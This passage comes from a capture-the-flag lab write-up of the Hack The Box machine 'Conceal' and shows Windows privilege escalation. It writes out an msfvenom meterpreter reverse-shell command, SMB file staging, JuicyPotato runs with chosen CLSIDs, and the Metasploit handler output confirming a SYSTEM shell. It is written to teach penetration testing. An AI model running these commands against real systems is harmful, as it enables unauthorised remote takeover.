However, no reverse shell came back. Instead of nc.exe I generated an msfvenom reverse shell, repeated the same process with the CLSID, and got the privileged shell.
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
On Windows
c:\Users\Destitute>cd Documents
cd Documents
c:\Users\Destitute\Documents>net use \\10.10.14.12\share /u:df df
net use \\10.10.14.12\share /u:df df
The command completed successfully.
c:\Users\Destitute\Documents>copy \\10.10.14.12\share\backdoor.exe backdoor.exe
copy \\10.10.14.12\share\backdoor.exe backdoor.exe
1 file(s) copied.
c:\Users\Destitute\Documents>JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
Privileged shell received on the Metasploit handler:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 1 opened (10.10.14.12:5555 -> 10.10.10.116:49701) at 2022-03-02 20:05:32 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 4540 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd c:\users\Administrator
cd c:\users\Administrator
c:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator
12/10/2018 22:07 <DIR> .
12/10/2018 22:07 <DIR> ..
12/10/2018 19:17 <DIR> Contacts
17/03/2021 16:01 <DIR> Desktop
12/10/2018 19:17 <DIR> Documents
17/03/2021 16:01 <DIR> Downloads
12/10/2018 19:17 <DIR> Favorites
12/10/2018 19:17 <DIR> Links
12/10/2018 19:17 <DIR> Music
17/03/2021 15:10 <DIR> OneDrive
12/10/2018 19:17 <DIR> Pictures
12/10/2018 19:17 <DIR> Saved Games
12/10/2018 19:17 <DIR> Searches
12/10/2018 19:17 <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 9,699,082,240 bytes free
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator\Desktop
17/03/2021 16:01 <DIR> .
17/03/2021 16:01 <DIR> ..
12/10/2018 22:57 32 proof.txt
1 File(s) 32 bytes
2 Dir(s) 9,699,082,240 bytes free
How to get the correct CLSID
There is no single correct answer for this. Based on the operating system, we can take the list from [here](juicy-potato/CLSID/Windows_10_Enterprise at master · ohpe/juicy-potato · GitHub) and try some CLSIDs at random. Alternatively, a script can test these CLSIDs and report which ones may work. Copy the following files to the Windows machine:
Test script and CLSID list (from the juicy-potato CLSID directory linked above):
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 CLSID.list
{BA7C0D29-81CA-4901-B450-634E20BB8C34}
{8C334A55-DDB9-491c-817E-35A6B85D2ECB}
{A5065670-136D-4FD6-A45F-00C85B90359C}
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF}
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
Use one of the Windows file transfer methods shown above to copy these files to the Windows machine.
Once transferred, run the batch file and look in result.log for CLSIDs that run as NT AUTHORITY\SYSTEM. Full results are uploaded here.
.\test_clsid.bat
{BA7C0D29-81CA-4901-B450-634E20BB8C34} 10000
{8C334A55-DDB9-491c-817E-35A6B85D2ECB} 10000
{A5065670-136D-4FD6-A45F-00C85B90359C} 10000
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF} 10000
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} 10000
{924DC564-16A6-42EB-929A-9A61FA7DA06F} 10000
{3631271D-DDD3-40f2-AC17-B13A3742BA62} 10000
{217700E0-2001-11DF-ADB9-F4CE462D9137} 10000
{3480A401-BDE9-4407-BC02-798A866AC051} 10000
Try the JuicyPotato command with some of the CLSIDs that run as NT AUTHORITY\SYSTEM.

Testing with one more CLSID than we tried earlier:
Directory of C:\users\Destitute\Documents
04/03/2022 00:26 <DIR> .
04/03/2022 00:26 <DIR> ..
03/03/2022 01:00 7,168 backdoor.exe
03/03/2022 01:16 28,640 CLSID.list
03/03/2022 01:19 1,580 GetCLSID.ps1
03/03/2022 01:20 259 getclsidtest.ps1
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
04/03/2022 00:42 4,657 result.log
09/03/2021 20:08 285 test_clsid.bat
8 File(s) 449,629 bytes
2 Dir(s) 9,719,095,296 bytes free
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Testing {d20a3293-3341-4ae8-9aaf-8e397cb63c34} 5555
......
[+] authresult 0
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We get a reverse shell:
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 2 opened (10.10.14.12:5555 -> 10.10.10.116:50774) at 2022-03-03 20:18:49 -0500
meterpreter > shell
Process 4920 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Key-Learnings
Always run an automated scan in addition to the manual scan, so that time is not wasted attacking non-vulnerable services. In this case UDP port 161 was missing from my initial scan, and the AutoRecon scan showed it.
strongSwan is used to build an IPsec VPN tunnel from the attack machine to the HTB machine based on the enumerated parameters. The IPsec config parameters required several modifications before they matched the server.
For privilege escalation the JuicyPotato exploit is used. Refer here for more about JuicyPotato.